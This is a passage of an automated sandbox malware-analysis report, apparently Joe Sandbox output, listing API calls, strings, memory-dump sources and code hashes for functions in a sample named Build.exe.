                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText$DialogWindow
                                                                                          • String ID: RENAMEDLG
                                                                                          • API String ID: 445417207-3299779563
                                                                                          • Opcode ID: c66439768e237502340dfb137596d2ee4920efa0d86420c166a96c06861a008d
                                                                                          • Instruction ID: e83aa9721170b2216f3908fb0936fd229219b3297accd0775bd734890725e709
                                                                                          • Opcode Fuzzy Hash: c66439768e237502340dfb137596d2ee4920efa0d86420c166a96c06861a008d
                                                                                          • Instruction Fuzzy Hash: 5601F1322852107ED2239B289C08FAB775CFB8B701F11C421F349E2190CB66AA008B65
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0038A676,?,?,0038A616,?,0039F7B0,0000000C,0038A76D,?,00000002), ref: 0038A6E5
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0038A6F8
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0038A676,?,?,0038A616,?,0039F7B0,0000000C,0038A76D,?,00000002,00000000), ref: 0038A71B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: aeda548225d5fe871456f133676190f70b712a1cfa040dedbdca312fa0420ca3
                                                                                          • Instruction ID: f5fbb0ea94d03f50512844b5f7558da381ee2bb4a3faeb5f575fef0dc897d4cd
                                                                                          • Opcode Fuzzy Hash: aeda548225d5fe871456f133676190f70b712a1cfa040dedbdca312fa0420ca3
                                                                                          • Instruction Fuzzy Hash: 06F04430505608BBDF12AFE4DC8AB9EBFB9EB08751F0141AAF805A6150DB315D40DB91
                                                                                          APIs
                                                                                            • Part of subcall function 00370244: _swprintf.LIBCMT ref: 00370284
                                                                                            • Part of subcall function 00370244: _strlen.LIBCMT ref: 003702A5
                                                                                            • Part of subcall function 00370244: SetDlgItemTextW.USER32(?,003A2274,?), ref: 003702FE
                                                                                            • Part of subcall function 00370244: GetWindowRect.USER32(?,?), ref: 00370334
                                                                                            • Part of subcall function 00370244: GetClientRect.USER32(?,?), ref: 00370340
                                                                                          • GetDlgItem.USER32(00000000,00003021), ref: 003613AA
                                                                                          • SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                          • String ID: 0$pP:$pP:
                                                                                          • API String ID: 2622349952-3110409460
                                                                                          • Opcode ID: ad414e310706452adae188f0e0597e22670b8160c3e7c140645eb615fb806e2c
                                                                                          • Instruction ID: 30dbfa041b845de7b61c6d347a4987742a72be98105332f09f39902f450cb133
                                                                                          • Opcode Fuzzy Hash: ad414e310706452adae188f0e0597e22670b8160c3e7c140645eb615fb806e2c
                                                                                          • Instruction Fuzzy Hash: 2BF0A43450424CA6DF170F229C0DBE93B6CEB02314F09C114FC4A94A96C7B4C950EF50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPointer$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 2252061734-0
                                                                                          • Opcode ID: 6f57785f23e35765207e16b0fdc2f68db1991f88b940c2e05c95b3fab9ba7e6b
                                                                                          • Instruction ID: 7e66a4ccf86da50de1b57029aabe87f9ed0fd31040ee4e5d7a16b5848aa08cb4
                                                                                          • Opcode Fuzzy Hash: 6f57785f23e35765207e16b0fdc2f68db1991f88b940c2e05c95b3fab9ba7e6b
                                                                                          • Instruction Fuzzy Hash: 3E51F376601B069FDB27BF50E841BBAB7A4EF54350F1544ADEC029B691E7B1EC40CB90
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0038E589
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038E5AC
                                                                                            • Part of subcall function 0038BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00386A24,?,0000015D,?,?,?,?,00387F00,000000FF,00000000,?,?), ref: 0038BCC0
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038E5D2
                                                                                          • _free.LIBCMT ref: 0038E5E5
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038E5F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 336800556-0
                                                                                          • Opcode ID: 485812add596adde14b1c901f338c367b1d6fa5f512e1eaa54377a38c946b861
                                                                                          • Instruction ID: 74dc15d016cd9a5979f088d9c8cab487ae79befa543420e5b6aff16601355149
                                                                                          • Opcode Fuzzy Hash: 485812add596adde14b1c901f338c367b1d6fa5f512e1eaa54377a38c946b861
                                                                                          • Instruction Fuzzy Hash: 5901D4726023127F6B2376765C89C7B6A6DEEC3BA831601AAB805C6205FE61CD0183B0
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,0038BC80,0038D7D8,?,0038B9D3,00000001,00000364,?,0038688D,?,?,003A50C4), ref: 0038BA2E
                                                                                          • _free.LIBCMT ref: 0038BA63
                                                                                          • _free.LIBCMT ref: 0038BA8A
                                                                                          • SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BA97
                                                                                          • SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BAA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free
                                                                                          • String ID:
                                                                                          • API String ID: 3170660625-0
                                                                                          • Opcode ID: 01547d1b903dbb9aedad083dcbcc2b559f2f01e9b2d05422b6c3c8df9d7ce46c
                                                                                          • Instruction ID: eaffcb0531acdef0970e744df83b9815404f3110928e694e2b7926cf27007d38
                                                                                          • Opcode Fuzzy Hash: 01547d1b903dbb9aedad083dcbcc2b559f2f01e9b2d05422b6c3c8df9d7ce46c
                                                                                          • Instruction Fuzzy Hash: 4F01F936105B03ABC21FB7396C87D6B626DDFC2371B2100A5F52596292EF6ACD019320
                                                                                          APIs
                                                                                            • Part of subcall function 003732AF: ResetEvent.KERNEL32(?), ref: 003732C1
                                                                                            • Part of subcall function 003732AF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 003732D5
                                                                                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000,92C77967,?,?,00000001,?,003952FF,000000FF,?,003743C0,?,00000000,?,00364766), ref: 00373007
                                                                                          • CloseHandle.KERNEL32(?,?,?,003743C0,?,00000000,?,00364766,?,?,?,00000000,?,?,?,00000001), ref: 00373021
                                                                                          • DeleteCriticalSection.KERNEL32(?,?,003743C0,?,00000000,?,00364766,?,?,?,00000000,?,?,?,00000001,?), ref: 0037303A
                                                                                          • CloseHandle.KERNEL32(?,?,003743C0,?,00000000,?,00364766,?,?,?,00000000,?,?,?,00000001,?), ref: 00373046
                                                                                          • CloseHandle.KERNEL32(?,?,003743C0,?,00000000,?,00364766,?,?,?,00000000,?,?,?,00000001,?), ref: 00373052
                                                                                            • Part of subcall function 003730CA: WaitForSingleObject.KERNEL32(?,000000FF,003731E7,?,?,0037325F,?,?,?,?,?,00373249), ref: 003730D0
                                                                                            • Part of subcall function 003730CA: GetLastError.KERNEL32(?,?,0037325F,?,?,?,?,?,00373249), ref: 003730DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 1868215902-0
                                                                                          • Opcode ID: 95a63533aac48b7dab03a4aea82f5d4d71e923debd7e3af7cfb6d2d23848f673
                                                                                          • Instruction ID: 4e4b6e64de4f24eb5ee1139bd09eafadd66c2953306510c3e2dcc078292b5aaa
                                                                                          • Opcode Fuzzy Hash: 95a63533aac48b7dab03a4aea82f5d4d71e923debd7e3af7cfb6d2d23848f673
                                                                                          • Instruction Fuzzy Hash: BB118072504B44EFC7239F64DCC6BC6BBADFB08710F00492AF16B92260CB766A44DB50
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0038EE67
                                                                                            • Part of subcall function 0038BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?), ref: 0038BB10
                                                                                            • Part of subcall function 0038BAFA: GetLastError.KERNEL32(?,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?,?), ref: 0038BB22
                                                                                          • _free.LIBCMT ref: 0038EE79
                                                                                          • _free.LIBCMT ref: 0038EE8B
                                                                                          • _free.LIBCMT ref: 0038EE9D
                                                                                          • _free.LIBCMT ref: 0038EEAF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: d34e2220570cb8203be54a4c5f1211e24345dc51980e37b88e7cc4e65fc562a4
                                                                                          • Instruction ID: fd6aa2040f7e69e292d01886e6e434a57fb6720c26b758b4e8e9782c7a355ace
                                                                                          • Opcode Fuzzy Hash: d34e2220570cb8203be54a4c5f1211e24345dc51980e37b88e7cc4e65fc562a4
                                                                                          • Instruction Fuzzy Hash: 3CF0EC32505304AFC666FB6DE885C9BB7EEBE41711B660885F449DB650CB74FC808B50
                                                                                          APIs
                                                                                            • Part of subcall function 0037C629: GetDC.USER32(00000000), ref: 0037C62D
                                                                                            • Part of subcall function 0037C629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0037C638
                                                                                            • Part of subcall function 0037C629: ReleaseDC.USER32(00000000,00000000), ref: 0037C643
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 0037C7E0
                                                                                            • Part of subcall function 0037CA67: GetDC.USER32(00000000), ref: 0037CA70
                                                                                            • Part of subcall function 0037CA67: GetObjectW.GDI32(?,00000018,?), ref: 0037CA9F
                                                                                            • Part of subcall function 0037CA67: ReleaseDC.USER32(00000000,?), ref: 0037CB37
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectRelease$CapsDevice
                                                                                          • String ID: ($f8
                                                                                          • API String ID: 1061551593-2255768631
                                                                                          • Opcode ID: e85735f10175ee07f0a0582866fc85e48756b556236208dc4e75a7a84835f55f
                                                                                          • Instruction ID: b817966a319cf1145257e6b3e86752b2c885d399b74de5e7de27ce0ff52adf28
                                                                                          • Opcode Fuzzy Hash: e85735f10175ee07f0a0582866fc85e48756b556236208dc4e75a7a84835f55f
                                                                                          • Instruction Fuzzy Hash: 1B91E271618354AFD621DF29C845E2BBBF8FF89B00F00495EF48AD7260CB75A905CB62
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _swprintf
                                                                                          • String ID: %ls$%s: %s
                                                                                          • API String ID: 589789837-2259941744
                                                                                          • Opcode ID: b69d93cc946a88a181cdd730d38a6867d32af63ea0fbf93033e3d1810c8a48d8
                                                                                          • Instruction ID: a494cf590e5ca260d7bdba21117c176cda1e114f06162c464e4010b3f4f0be22
                                                                                          • Opcode Fuzzy Hash: b69d93cc946a88a181cdd730d38a6867d32af63ea0fbf93033e3d1810c8a48d8
                                                                                          • Instruction Fuzzy Hash: 6B5126B5288344FAF6371A948D43F6577ACAB0AF00F10C506B3CE698D1D6BA97407E13
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe,00000104), ref: 0038A800
                                                                                          • _free.LIBCMT ref: 0038A8CB
                                                                                          • _free.LIBCMT ref: 0038A8D5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$FileModuleName
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe
                                                                                          • API String ID: 2506810119-3608859494
                                                                                          • Opcode ID: 5469ffc69f6ca27d9e9f54b8ff4212ea53d357f504890dfa4cdcf1bdc2afedb7
                                                                                          • Instruction ID: 188666988ad05061b9ff8e14dce486eba52504a1d0e1c6c01c841685ec1a1f8c
                                                                                          • Opcode Fuzzy Hash: 5469ffc69f6ca27d9e9f54b8ff4212ea53d357f504890dfa4cdcf1bdc2afedb7
                                                                                          • Instruction Fuzzy Hash: 3C314071A00B14EFEB13EB99D885D9EBFFCEB85710F1140A7E5049B211D6709A41DBA2
                                                                                          APIs
                                                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0038581B
                                                                                          • _abort.LIBCMT ref: 00385926
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: EncodePointer_abort
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 948111806-2084237596
                                                                                          • Opcode ID: ba6124c979c5a592dbecfb8dd8cf94f84cffa56a74e6c33e6e48b5b5d7535a3f
                                                                                          • Instruction ID: c1c85ddccd3615913d9e84901d28d5fe7b157cdc0134b4990151c908134080a7
                                                                                          • Opcode Fuzzy Hash: ba6124c979c5a592dbecfb8dd8cf94f84cffa56a74e6c33e6e48b5b5d7535a3f
                                                                                          • Instruction Fuzzy Hash: C9413872A0060DEFCF16EFA4CC85AAEBBB5FF48314F198099F914AB221D3359950DB50
                                                                                          APIs
                                                                                          • __fprintf_l.LIBCMT ref: 0036F82D
                                                                                          • _strncpy.LIBCMT ref: 0036F871
                                                                                            • Part of subcall function 00373F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0036F801,00000000,00000000,?,003A5070,?,0036F801,?,?,00000050,?), ref: 00373F64
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                          • String ID: $%s$@%s
                                                                                          • API String ID: 562999700-834177443
                                                                                          • Opcode ID: b172af85a0ba67f544e24ffb5d9697594ed071bee76e9c969dec1a4805f5669a
                                                                                          • Instruction ID: 54135d146fab4ca2a31e9d55b5ed1fcbceb749c08e40ad29f97a8bee8cab2f0d
                                                                                          • Opcode Fuzzy Hash: b172af85a0ba67f544e24ffb5d9697594ed071bee76e9c969dec1a4805f5669a
                                                                                          • Instruction Fuzzy Hash: 25218E72900308AFDB22EFA4DC02BAE77A8BB15300F04456AF92597191E772E9058B50
                                                                                          APIs
                                                                                            • Part of subcall function 00361366: GetDlgItem.USER32(00000000,00003021), ref: 003613AA
                                                                                            • Part of subcall function 00361366: SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0
                                                                                          • EndDialog.USER32(?,00000001), ref: 0037CE28
                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0037CE3D
                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 0037CE52
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText$DialogWindow
                                                                                          • String ID: ASKNEXTVOL
                                                                                          • API String ID: 445417207-3402441367
                                                                                          • Opcode ID: 3c423bc411407ffca0eec8e09845e8a7f24f9f922d641b62a1c811d828b398b4
                                                                                          • Instruction ID: fe235ab4386ffaf114f909fb6b7ec50fb0f501e495d0ad9e2676d513c9de2db9
                                                                                          • Opcode Fuzzy Hash: 3c423bc411407ffca0eec8e09845e8a7f24f9f922d641b62a1c811d828b398b4
